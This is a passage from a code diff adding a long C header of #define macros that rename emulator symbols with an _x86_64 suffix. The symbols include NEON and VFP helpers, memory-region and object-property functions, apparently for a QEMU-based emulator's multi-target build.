helper_neon_qneg_s16_x86_64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_x86_64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_x86_64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_x86_64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_x86_64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_x86_64 +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_x86_64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_x86_64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_x86_64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_x86_64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_x86_64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_x86_64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_x86_64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_x86_64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_x86_64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_x86_64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_x86_64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_x86_64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_x86_64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_x86_64 +#define helper_neon_qshl_u64 helper_neon_qshl_u64_x86_64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_x86_64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_x86_64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_x86_64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_x86_64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_x86_64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_x86_64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_x86_64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_x86_64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_x86_64 +#define helper_neon_qsub_u16 helper_neon_qsub_u16_x86_64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_x86_64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_x86_64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_x86_64 +#define helper_neon_qunzip16 helper_neon_qunzip16_x86_64 +#define helper_neon_qunzip32 helper_neon_qunzip32_x86_64 +#define helper_neon_qunzip8 helper_neon_qunzip8_x86_64 +#define helper_neon_qzip16 helper_neon_qzip16_x86_64 +#define helper_neon_qzip32 helper_neon_qzip32_x86_64 +#define helper_neon_qzip8 helper_neon_qzip8_x86_64 +#define helper_neon_rbit_u8 helper_neon_rbit_u8_x86_64 +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_x86_64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_x86_64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_x86_64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_x86_64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_x86_64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_x86_64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_x86_64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_x86_64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_x86_64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_x86_64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_x86_64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_x86_64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_x86_64 +#define helper_neon_rshl_u8 helper_neon_rshl_u8_x86_64 +#define helper_neon_shl_s16 helper_neon_shl_s16_x86_64 +#define helper_neon_shl_s32 helper_neon_shl_s32_x86_64 +#define helper_neon_shl_s64 helper_neon_shl_s64_x86_64 +#define helper_neon_shl_s8 helper_neon_shl_s8_x86_64 +#define helper_neon_shl_u16 helper_neon_shl_u16_x86_64 +#define helper_neon_shl_u32 helper_neon_shl_u32_x86_64 +#define helper_neon_shl_u64 helper_neon_shl_u64_x86_64 +#define helper_neon_shl_u8 helper_neon_shl_u8_x86_64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_x86_64 +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_x86_64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_x86_64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_x86_64 +#define helper_neon_subl_u16 helper_neon_subl_u16_x86_64 +#define helper_neon_subl_u32 helper_neon_subl_u32_x86_64 +#define helper_neon_sub_u16 helper_neon_sub_u16_x86_64 +#define helper_neon_sub_u8 helper_neon_sub_u8_x86_64 +#define helper_neon_tbl helper_neon_tbl_x86_64 +#define helper_neon_tst_u16 helper_neon_tst_u16_x86_64 +#define helper_neon_tst_u32 helper_neon_tst_u32_x86_64 +#define helper_neon_tst_u8 helper_neon_tst_u8_x86_64 +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_x86_64 +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_x86_64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_x86_64 +#define helper_neon_unzip16 helper_neon_unzip16_x86_64 +#define helper_neon_unzip8 helper_neon_unzip8_x86_64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_x86_64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_x86_64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_x86_64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_x86_64 +#define helper_neon_widen_s16 helper_neon_widen_s16_x86_64 +#define helper_neon_widen_s8 helper_neon_widen_s8_x86_64 +#define helper_neon_widen_u16 helper_neon_widen_u16_x86_64 +#define helper_neon_widen_u8 helper_neon_widen_u8_x86_64 +#define helper_neon_zip16 helper_neon_zip16_x86_64 +#define helper_neon_zip8 helper_neon_zip8_x86_64 +#define helper_pre_hvc helper_pre_hvc_x86_64 +#define helper_pre_smc helper_pre_smc_x86_64 +#define helper_qadd16 helper_qadd16_x86_64 +#define helper_qadd8 helper_qadd8_x86_64 +#define helper_qaddsubx helper_qaddsubx_x86_64 +#define helper_qsub16 helper_qsub16_x86_64 +#define helper_qsub8 helper_qsub8_x86_64 +#define helper_qsubaddx helper_qsubaddx_x86_64 +#define helper_rbit helper_rbit_x86_64 +#define helper_recpe_f32 helper_recpe_f32_x86_64 +#define helper_recpe_f64 helper_recpe_f64_x86_64 +#define helper_recpe_u32 helper_recpe_u32_x86_64 +#define helper_recps_f32 helper_recps_f32_x86_64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_x86_64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_x86_64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_x86_64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_x86_64 +#define helper_rintd helper_rintd_x86_64 +#define helper_rintd_exact helper_rintd_exact_x86_64 +#define helper_rints helper_rints_x86_64 +#define helper_rints_exact helper_rints_exact_x86_64 +#define helper_ror_cc helper_ror_cc_x86_64 +#define helper_rsqrte_f32 helper_rsqrte_f32_x86_64 +#define helper_rsqrte_f64 helper_rsqrte_f64_x86_64 +#define helper_rsqrte_u32 helper_rsqrte_u32_x86_64 +#define helper_rsqrts_f32 helper_rsqrts_f32_x86_64 +#define helper_sadd16 helper_sadd16_x86_64 +#define helper_sadd8 helper_sadd8_x86_64 +#define helper_saddsubx helper_saddsubx_x86_64 +#define helper_sar_cc helper_sar_cc_x86_64 +#define helper_sdiv helper_sdiv_x86_64 +#define helper_sel_flags helper_sel_flags_x86_64 +#define helper_set_cp_reg helper_set_cp_reg_x86_64 +#define helper_set_cp_reg64 helper_set_cp_reg64_x86_64 +#define helper_set_neon_rmode helper_set_neon_rmode_x86_64 +#define helper_set_r13_banked helper_set_r13_banked_x86_64 +#define helper_set_rmode helper_set_rmode_x86_64 +#define helper_set_user_reg helper_set_user_reg_x86_64 +#define helper_shadd16 helper_shadd16_x86_64 +#define helper_shadd8 helper_shadd8_x86_64 +#define helper_shaddsubx helper_shaddsubx_x86_64 +#define helper_shl_cc helper_shl_cc_x86_64 +#define helper_shr_cc helper_shr_cc_x86_64 +#define helper_shsub16 helper_shsub16_x86_64 +#define helper_shsub8 helper_shsub8_x86_64 +#define helper_shsubaddx helper_shsubaddx_x86_64 +#define helper_ssat helper_ssat_x86_64 +#define helper_ssat16 helper_ssat16_x86_64 +#define helper_ssub16 helper_ssub16_x86_64 +#define helper_ssub8 helper_ssub8_x86_64 +#define helper_ssubaddx helper_ssubaddx_x86_64 +#define helper_stb_mmu helper_stb_mmu_x86_64 +#define helper_stl_mmu helper_stl_mmu_x86_64 +#define helper_stq_mmu helper_stq_mmu_x86_64 +#define helper_stw_mmu helper_stw_mmu_x86_64 +#define helper_sub_saturate helper_sub_saturate_x86_64 +#define helper_sub_usaturate helper_sub_usaturate_x86_64 +#define helper_sxtb16 helper_sxtb16_x86_64 +#define helper_uadd16 helper_uadd16_x86_64 +#define helper_uadd8 helper_uadd8_x86_64 +#define helper_uaddsubx helper_uaddsubx_x86_64 +#define helper_udiv helper_udiv_x86_64 +#define helper_uhadd16 helper_uhadd16_x86_64 +#define helper_uhadd8 helper_uhadd8_x86_64 +#define helper_uhaddsubx helper_uhaddsubx_x86_64 +#define helper_uhsub16 helper_uhsub16_x86_64 +#define helper_uhsub8 helper_uhsub8_x86_64 +#define helper_uhsubaddx helper_uhsubaddx_x86_64 +#define helper_uqadd16 helper_uqadd16_x86_64 +#define helper_uqadd8 helper_uqadd8_x86_64 +#define helper_uqaddsubx helper_uqaddsubx_x86_64 +#define helper_uqsub16 helper_uqsub16_x86_64 +#define helper_uqsub8 helper_uqsub8_x86_64 +#define helper_uqsubaddx helper_uqsubaddx_x86_64 +#define helper_usad8 helper_usad8_x86_64 +#define helper_usat helper_usat_x86_64 +#define helper_usat16 helper_usat16_x86_64 +#define helper_usub16 helper_usub16_x86_64 +#define helper_usub8 helper_usub8_x86_64 +#define helper_usubaddx helper_usubaddx_x86_64 +#define helper_uxtb16 helper_uxtb16_x86_64 +#define helper_v7m_mrs helper_v7m_mrs_x86_64 +#define helper_v7m_msr helper_v7m_msr_x86_64 +#define helper_vfp_absd helper_vfp_absd_x86_64 +#define helper_vfp_abss helper_vfp_abss_x86_64 +#define helper_vfp_addd helper_vfp_addd_x86_64 +#define helper_vfp_adds helper_vfp_adds_x86_64 +#define helper_vfp_cmpd helper_vfp_cmpd_x86_64 +#define helper_vfp_cmped helper_vfp_cmped_x86_64 +#define helper_vfp_cmpes helper_vfp_cmpes_x86_64 +#define helper_vfp_cmps helper_vfp_cmps_x86_64 +#define helper_vfp_divd helper_vfp_divd_x86_64 +#define helper_vfp_divs helper_vfp_divs_x86_64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_x86_64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_x86_64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_x86_64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_x86_64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_x86_64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_x86_64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_x86_64 +#define helper_vfp_maxd helper_vfp_maxd_x86_64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_x86_64 +#define helper_vfp_maxnums helper_vfp_maxnums_x86_64 +#define helper_vfp_maxs helper_vfp_maxs_x86_64 +#define helper_vfp_mind helper_vfp_mind_x86_64 +#define helper_vfp_minnumd helper_vfp_minnumd_x86_64 +#define helper_vfp_minnums helper_vfp_minnums_x86_64 +#define helper_vfp_mins helper_vfp_mins_x86_64 +#define helper_vfp_muladdd helper_vfp_muladdd_x86_64 +#define helper_vfp_muladds helper_vfp_muladds_x86_64 +#define helper_vfp_muld helper_vfp_muld_x86_64 +#define helper_vfp_muls helper_vfp_muls_x86_64 +#define helper_vfp_negd helper_vfp_negd_x86_64 +#define helper_vfp_negs helper_vfp_negs_x86_64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_x86_64 +#define helper_vfp_shtod helper_vfp_shtod_x86_64 +#define helper_vfp_shtos helper_vfp_shtos_x86_64 +#define helper_vfp_sitod helper_vfp_sitod_x86_64 +#define helper_vfp_sitos helper_vfp_sitos_x86_64 +#define helper_vfp_sltod helper_vfp_sltod_x86_64 +#define helper_vfp_sltos helper_vfp_sltos_x86_64 +#define helper_vfp_sqrtd helper_vfp_sqrtd_x86_64 +#define helper_vfp_sqrts helper_vfp_sqrts_x86_64 +#define helper_vfp_sqtod helper_vfp_sqtod_x86_64 +#define helper_vfp_sqtos helper_vfp_sqtos_x86_64 +#define helper_vfp_subd helper_vfp_subd_x86_64 +#define helper_vfp_subs helper_vfp_subs_x86_64 +#define helper_vfp_toshd helper_vfp_toshd_x86_64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_x86_64 +#define helper_vfp_toshs helper_vfp_toshs_x86_64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_x86_64 +#define helper_vfp_tosid helper_vfp_tosid_x86_64 +#define helper_vfp_tosis helper_vfp_tosis_x86_64 +#define helper_vfp_tosizd helper_vfp_tosizd_x86_64 +#define helper_vfp_tosizs helper_vfp_tosizs_x86_64 +#define helper_vfp_tosld helper_vfp_tosld_x86_64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_x86_64 +#define helper_vfp_tosls helper_vfp_tosls_x86_64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_x86_64 +#define helper_vfp_tosqd helper_vfp_tosqd_x86_64 +#define helper_vfp_tosqs helper_vfp_tosqs_x86_64 +#define helper_vfp_touhd helper_vfp_touhd_x86_64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_x86_64 +#define helper_vfp_touhs helper_vfp_touhs_x86_64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_x86_64 +#define helper_vfp_touid helper_vfp_touid_x86_64 +#define helper_vfp_touis helper_vfp_touis_x86_64 +#define helper_vfp_touizd helper_vfp_touizd_x86_64 +#define helper_vfp_touizs helper_vfp_touizs_x86_64 +#define helper_vfp_tould helper_vfp_tould_x86_64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_x86_64 +#define helper_vfp_touls helper_vfp_touls_x86_64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_x86_64 +#define helper_vfp_touqd helper_vfp_touqd_x86_64 +#define helper_vfp_touqs helper_vfp_touqs_x86_64 +#define helper_vfp_uhtod helper_vfp_uhtod_x86_64 +#define helper_vfp_uhtos helper_vfp_uhtos_x86_64 +#define helper_vfp_uitod helper_vfp_uitod_x86_64 +#define helper_vfp_uitos helper_vfp_uitos_x86_64 +#define helper_vfp_ultod helper_vfp_ultod_x86_64 +#define helper_vfp_ultos helper_vfp_ultos_x86_64 +#define helper_vfp_uqtod helper_vfp_uqtod_x86_64 +#define helper_vfp_uqtos helper_vfp_uqtos_x86_64 +#define helper_wfe helper_wfe_x86_64 +#define helper_wfi helper_wfi_x86_64 +#define hex2decimal hex2decimal_x86_64 +#define hw_breakpoint_update hw_breakpoint_update_x86_64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_x86_64 +#define hw_watchpoint_update hw_watchpoint_update_x86_64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_x86_64 +#define _init _init_x86_64 +#define init_cpreg_list init_cpreg_list_x86_64 +#define init_lists init_lists_x86_64 +#define input_type_enum input_type_enum_x86_64 +#define int128_2_64 int128_2_64_x86_64 +#define int128_add int128_add_x86_64 +#define int128_addto int128_addto_x86_64 +#define int128_and int128_and_x86_64 +#define int128_eq int128_eq_x86_64 +#define int128_ge int128_ge_x86_64 +#define int128_get64 int128_get64_x86_64 +#define int128_gt int128_gt_x86_64 +#define int128_le int128_le_x86_64 +#define int128_lt int128_lt_x86_64 +#define int128_make64 int128_make64_x86_64 +#define int128_max int128_max_x86_64 +#define int128_min int128_min_x86_64 +#define int128_ne int128_ne_x86_64 +#define int128_neg int128_neg_x86_64 +#define int128_nz int128_nz_x86_64 +#define int128_rshift int128_rshift_x86_64 +#define int128_sub int128_sub_x86_64 +#define int128_subfrom int128_subfrom_x86_64 +#define int128_zero int128_zero_x86_64 +#define int16_to_float32 int16_to_float32_x86_64 +#define int16_to_float64 int16_to_float64_x86_64 +#define int32_to_float128 int32_to_float128_x86_64 +#define int32_to_float32 int32_to_float32_x86_64 +#define int32_to_float64 int32_to_float64_x86_64 +#define int32_to_floatx80 int32_to_floatx80_x86_64 +#define int64_to_float128 int64_to_float128_x86_64 +#define int64_to_float32 int64_to_float32_x86_64 +#define int64_to_float64 int64_to_float64_x86_64 +#define int64_to_floatx80 int64_to_floatx80_x86_64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_x86_64 +#define invalidate_page_bitmap invalidate_page_bitmap_x86_64 +#define io_mem_read io_mem_read_x86_64 +#define io_mem_write io_mem_write_x86_64 +#define io_readb io_readb_x86_64 +#define io_readl io_readl_x86_64 +#define io_readq io_readq_x86_64 +#define io_readw io_readw_x86_64 +#define iotlb_to_region iotlb_to_region_x86_64 +#define io_writeb io_writeb_x86_64 +#define io_writel io_writel_x86_64 +#define io_writeq io_writeq_x86_64 +#define io_writew io_writew_x86_64 +#define is_a64 is_a64_x86_64 +#define is_help_option is_help_option_x86_64 +#define isr_read isr_read_x86_64 +#define is_valid_option_list is_valid_option_list_x86_64 +#define iwmmxt_load_creg iwmmxt_load_creg_x86_64 +#define iwmmxt_load_reg iwmmxt_load_reg_x86_64 +#define iwmmxt_store_creg iwmmxt_store_creg_x86_64 +#define iwmmxt_store_reg iwmmxt_store_reg_x86_64 +#define __jit_debug_descriptor __jit_debug_descriptor_x86_64 +#define __jit_debug_register_code __jit_debug_register_code_x86_64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_x86_64 +#define last_ram_offset last_ram_offset_x86_64 +#define ldl_be_p ldl_be_p_x86_64 +#define ldl_be_phys ldl_be_phys_x86_64 +#define ldl_he_p ldl_he_p_x86_64 +#define ldl_le_p ldl_le_p_x86_64 +#define ldl_le_phys ldl_le_phys_x86_64 +#define ldl_phys ldl_phys_x86_64 +#define ldl_phys_internal ldl_phys_internal_x86_64 +#define ldq_be_p ldq_be_p_x86_64 +#define ldq_be_phys ldq_be_phys_x86_64 +#define ldq_he_p ldq_he_p_x86_64 +#define ldq_le_p ldq_le_p_x86_64 +#define ldq_le_phys ldq_le_phys_x86_64 +#define ldq_phys ldq_phys_x86_64 +#define ldq_phys_internal ldq_phys_internal_x86_64 +#define ldst_name ldst_name_x86_64 +#define ldub_p ldub_p_x86_64 +#define ldub_phys ldub_phys_x86_64 +#define lduw_be_p lduw_be_p_x86_64 +#define lduw_be_phys lduw_be_phys_x86_64 +#define lduw_he_p lduw_he_p_x86_64 +#define lduw_le_p lduw_le_p_x86_64 +#define lduw_le_phys lduw_le_phys_x86_64 +#define lduw_phys lduw_phys_x86_64 +#define lduw_phys_internal lduw_phys_internal_x86_64 +#define le128 le128_x86_64 +#define linked_bp_matches linked_bp_matches_x86_64 +#define listener_add_address_space listener_add_address_space_x86_64 +#define load_cpu_offset load_cpu_offset_x86_64 +#define load_reg load_reg_x86_64 +#define load_reg_var load_reg_var_x86_64 +#define log_cpu_state log_cpu_state_x86_64 +#define lpae_cp_reginfo lpae_cp_reginfo_x86_64 +#define lt128 lt128_x86_64 +#define machine_class_init machine_class_init_x86_64 +#define machine_finalize machine_finalize_x86_64 +#define machine_info machine_info_x86_64 +#define machine_initfn machine_initfn_x86_64 +#define machine_register_types machine_register_types_x86_64 +#define machvirt_init machvirt_init_x86_64 +#define machvirt_machine_init machvirt_machine_init_x86_64 +#define maj maj_x86_64 +#define mapping_conflict mapping_conflict_x86_64 +#define mapping_contiguous mapping_contiguous_x86_64 +#define mapping_have_same_region mapping_have_same_region_x86_64 +#define mapping_merge mapping_merge_x86_64 +#define mem_add mem_add_x86_64 +#define mem_begin mem_begin_x86_64 +#define mem_commit mem_commit_x86_64 +#define memory_access_is_direct memory_access_is_direct_x86_64 +#define memory_access_size memory_access_size_x86_64 +#define memory_init memory_init_x86_64 +#define memory_listener_match memory_listener_match_x86_64 +#define memory_listener_register memory_listener_register_x86_64 +#define memory_listener_unregister memory_listener_unregister_x86_64 +#define memory_map_init memory_map_init_x86_64 +#define memory_mapping_filter memory_mapping_filter_x86_64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_x86_64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_x86_64 +#define memory_mapping_list_free memory_mapping_list_free_x86_64 +#define memory_mapping_list_init memory_mapping_list_init_x86_64 +#define memory_region_access_valid memory_region_access_valid_x86_64 +#define memory_region_add_subregion memory_region_add_subregion_x86_64 +#define memory_region_add_subregion_common memory_region_add_subregion_common_x86_64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_x86_64 +#define memory_region_big_endian memory_region_big_endian_x86_64 +#define memory_region_clear_pending memory_region_clear_pending_x86_64 +#define memory_region_del_subregion memory_region_del_subregion_x86_64 +#define memory_region_destructor_alias memory_region_destructor_alias_x86_64 +#define memory_region_destructor_none memory_region_destructor_none_x86_64 +#define memory_region_destructor_ram memory_region_destructor_ram_x86_64 +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_x86_64 +#define memory_region_dispatch_read memory_region_dispatch_read_x86_64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_x86_64 +#define memory_region_dispatch_write memory_region_dispatch_write_x86_64 +#define memory_region_escape_name memory_region_escape_name_x86_64 +#define memory_region_finalize memory_region_finalize_x86_64 +#define memory_region_find memory_region_find_x86_64 +#define memory_region_get_addr memory_region_get_addr_x86_64 +#define memory_region_get_alignment memory_region_get_alignment_x86_64 +#define memory_region_get_container memory_region_get_container_x86_64 +#define memory_region_get_fd memory_region_get_fd_x86_64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_x86_64 +#define memory_region_get_priority memory_region_get_priority_x86_64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_x86_64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_x86_64 +#define memory_region_get_size memory_region_get_size_x86_64 +#define memory_region_info memory_region_info_x86_64 +#define memory_region_init memory_region_init_x86_64 +#define memory_region_init_alias memory_region_init_alias_x86_64 +#define memory_region_initfn memory_region_initfn_x86_64 +#define memory_region_init_io memory_region_init_io_x86_64 +#define memory_region_init_ram memory_region_init_ram_x86_64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_x86_64 +#define memory_region_init_reservation memory_region_init_reservation_x86_64 +#define memory_region_is_iommu memory_region_is_iommu_x86_64 +#define memory_region_is_logging memory_region_is_logging_x86_64 +#define memory_region_is_mapped memory_region_is_mapped_x86_64 +#define memory_region_is_ram memory_region_is_ram_x86_64 +#define memory_region_is_rom memory_region_is_rom_x86_64 +#define memory_region_is_romd memory_region_is_romd_x86_64 +#define memory_region_is_skip_dump memory_region_is_skip_dump_x86_64 +#define memory_region_is_unassigned memory_region_is_unassigned_x86_64 +#define memory_region_name memory_region_name_x86_64 +#define memory_region_need_escape memory_region_need_escape_x86_64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_x86_64 +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_x86_64 +#define memory_region_present memory_region_present_x86_64 +#define memory_region_read_accessor memory_region_read_accessor_x86_64 +#define memory_region_readd_subregion memory_region_readd_subregion_x86_64 +#define memory_region_ref memory_region_ref_x86_64 +#define memory_region_resolve_container memory_region_resolve_container_x86_64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_x86_64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_x86_64 +#define memory_region_set_address memory_region_set_address_x86_64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_x86_64 +#define memory_region_set_enabled memory_region_set_enabled_x86_64 +#define memory_region_set_readonly memory_region_set_readonly_x86_64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_x86_64 +#define memory_region_size memory_region_size_x86_64 +#define memory_region_to_address_space memory_region_to_address_space_x86_64 +#define memory_region_transaction_begin memory_region_transaction_begin_x86_64 +#define memory_region_transaction_commit memory_region_transaction_commit_x86_64 +#define memory_region_unref memory_region_unref_x86_64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_x86_64 +#define memory_region_write_accessor memory_region_write_accessor_x86_64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_x86_64 +#define memory_try_enable_merging memory_try_enable_merging_x86_64 +#define module_call_init module_call_init_x86_64 +#define module_load module_load_x86_64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_x86_64 +#define mpidr_read mpidr_read_x86_64 +#define msr_mask msr_mask_x86_64 +#define mul128By64To192 mul128By64To192_x86_64 +#define mul128To256 mul128To256_x86_64 +#define mul64To128 mul64To128_x86_64 +#define muldiv64 muldiv64_x86_64 +#define neon_2rm_is_float_op neon_2rm_is_float_op_x86_64 +#define neon_2rm_sizes neon_2rm_sizes_x86_64 +#define neon_3r_sizes neon_3r_sizes_x86_64 +#define neon_get_scalar neon_get_scalar_x86_64 +#define neon_load_reg neon_load_reg_x86_64 +#define neon_load_reg64 neon_load_reg64_x86_64 +#define neon_load_scratch neon_load_scratch_x86_64 +#define neon_ls_element_type neon_ls_element_type_x86_64 +#define neon_reg_offset neon_reg_offset_x86_64 +#define neon_store_reg neon_store_reg_x86_64 +#define neon_store_reg64 neon_store_reg64_x86_64 +#define neon_store_scratch neon_store_scratch_x86_64 +#define new_ldst_label new_ldst_label_x86_64 +#define next_list next_list_x86_64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_x86_64 +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_x86_64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_x86_64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_x86_64 +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_x86_64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_x86_64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_x86_64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_x86_64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_x86_64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_x86_64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_x86_64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_x86_64 +#define object_child_foreach object_child_foreach_x86_64 +#define object_class_foreach object_class_foreach_x86_64 +#define object_class_foreach_tramp object_class_foreach_tramp_x86_64 +#define object_class_get_list object_class_get_list_x86_64 +#define object_class_get_list_tramp object_class_get_list_tramp_x86_64 +#define object_class_get_parent object_class_get_parent_x86_64 +#define object_deinit object_deinit_x86_64 +#define object_dynamic_cast object_dynamic_cast_x86_64 +#define object_finalize object_finalize_x86_64 +#define object_finalize_child_property object_finalize_child_property_x86_64 +#define object_get_child_property object_get_child_property_x86_64 +#define object_get_link_property object_get_link_property_x86_64 +#define object_get_root object_get_root_x86_64 +#define object_initialize_with_type object_initialize_with_type_x86_64 +#define object_init_with_type object_init_with_type_x86_64 +#define object_instance_init object_instance_init_x86_64 +#define object_new_with_type object_new_with_type_x86_64 +#define object_post_init_with_type object_post_init_with_type_x86_64 +#define object_property_add_alias object_property_add_alias_x86_64 +#define object_property_add_link object_property_add_link_x86_64 +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_x86_64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_x86_64 +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_x86_64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_x86_64 +#define object_property_allow_set_link object_property_allow_set_link_x86_64 +#define object_property_del object_property_del_x86_64 +#define object_property_del_all object_property_del_all_x86_64 +#define object_property_find object_property_find_x86_64 +#define object_property_get object_property_get_x86_64 +#define object_property_get_bool object_property_get_bool_x86_64 +#define object_property_get_int object_property_get_int_x86_64 +#define object_property_get_link object_property_get_link_x86_64 +#define object_property_get_qobject object_property_get_qobject_x86_64 +#define object_property_get_str object_property_get_str_x86_64 +#define object_property_get_type object_property_get_type_x86_64 +#define object_property_is_child object_property_is_child_x86_64 +#define object_property_set object_property_set_x86_64 +#define object_property_set_description object_property_set_description_x86_64 +#define object_property_set_link object_property_set_link_x86_64 +#define object_property_set_qobject object_property_set_qobject_x86_64 +#define object_release_link_property object_release_link_property_x86_64 +#define object_resolve_abs_path object_resolve_abs_path_x86_64 +#define object_resolve_child_property object_resolve_child_property_x86_64 +#define object_resolve_link object_resolve_link_x86_64 +#define object_resolve_link_property object_resolve_link_property_x86_64 +#define object_resolve_partial_path object_resolve_partial_path_x86_64 +#define object_resolve_path object_resolve_path_x86_64 +#define object_resolve_path_component object_resolve_path_component_x86_64 +#define object_resolve_path_type object_resolve_path_type_x86_64 +#define object_set_link_property object_set_link_property_x86_64 +#define object_unparent object_unparent_x86_64 +#define omap_cachemaint_write omap_cachemaint_write_x86_64 +#define omap_cp_reginfo omap_cp_reginfo_x86_64 +#define omap_threadid_write omap_threadid_write_x86_64 +#define omap_ticonfig_write omap_ticonfig_write_x86_64 +#define omap_wfi_write omap_wfi_write_x86_64 +#define op_bits op_bits_x86_64 +#define 